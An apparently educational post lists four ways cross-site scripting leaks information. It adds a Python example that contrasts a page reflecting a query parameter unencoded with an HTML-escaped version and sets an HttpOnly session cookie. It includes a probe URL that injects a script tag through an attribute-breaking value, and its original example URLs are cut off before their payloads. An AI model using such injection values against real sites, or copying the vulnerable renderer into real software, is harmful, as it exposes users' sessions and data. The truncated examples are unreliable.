Types of information leakage due to XSS attacks
1. Client can reveal cookies to a third party (session state, order info, etc.)
http://host/a.php?variable=">
2. Client can reveal posted form items to a third party (userID/passwd, etc.)
3. Client can be tricked into accessing/posting spoofed info to a trusted server
http://www.trustedserver.com/xss.asp?name =
4. Client can be tricked into attacking other sites
/hello.asp?name =
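All four cases above start from a page that reflects a query parameter into its HTML without encoding it. The following is an added example, not code from the original post: it shows a reflecting page beside its encoded form, plus a session cookie marked HttpOnly so script cannot read it (item 1). The function names, the `session` cookie name and the probe URL are assumptions constructed for illustration.

```python
import html
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit

# Constructed probe: a harmless script tag that first closes an attribute value.
PROBE_URL = "http://host/hello.asp?name=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"


def get_name(url):
    """Return the decoded 'name' query parameter, or '' if it is absent."""
    return parse_qs(urlsplit(url).query).get("name", [""])[0]


def render_vulnerable(name):
    # Reflects the parameter verbatim: markup in 'name' becomes part of the page.
    return '<input type="text" value="' + name + '"><p>Hello ' + name + "</p>"


def render_hardened(name):
    # Encode for the HTML context; quote=True also encodes " and ' so the
    # value cannot close the surrounding attribute.
    safe = html.escape(name, quote=True)
    return '<input type="text" value="' + safe + '"><p>Hello ' + safe + "</p>"


def session_cookie_header(session_id):
    # HttpOnly hides the cookie from document.cookie, Secure restricts it to
    # HTTPS, and SameSite=Lax limits cross-site sends of the cookie.
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Lax"
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()


if __name__ == "__main__":
    name = get_name(PROBE_URL)
    print("vulnerable:", render_vulnerable(name))
    print("hardened:  ", render_hardened(name))
    print("Set-Cookie:", session_cookie_header("abc123"))
```

Encoding must match the output context: `html.escape` covers HTML body text and quoted attribute values, not values placed inside script blocks or URLs.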